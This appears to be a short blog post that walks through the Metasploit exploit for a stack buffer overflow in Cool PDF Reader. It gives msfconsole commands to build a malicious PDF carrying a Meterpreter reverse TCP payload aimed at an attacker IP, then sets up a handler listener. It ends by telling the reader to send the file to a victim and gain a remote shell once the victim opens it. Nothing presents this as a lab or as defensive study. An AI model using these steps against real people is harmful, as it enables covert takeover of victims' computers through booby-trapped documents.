Hacked Remote PC Using Cool PDF Image Stream Buffer Overflow

This module exploits a stack buffer overflow in Cool PDF Reader prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP

Exploit Targets
Windows XP SP 3
Cool PDF 3.0.2.256

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/coolpdf_image_strem_bof
msf exploit (coolpdf_image_strem_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (coolpdf_image_strem_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (coolpdf_image_strem_bof)>exploit


After we successfully generate the malicious pdf File, it will stored on your local computer
/root/.msf4/local/msf.pdf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit

Now send your msf.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


0 comments:

Post a Comment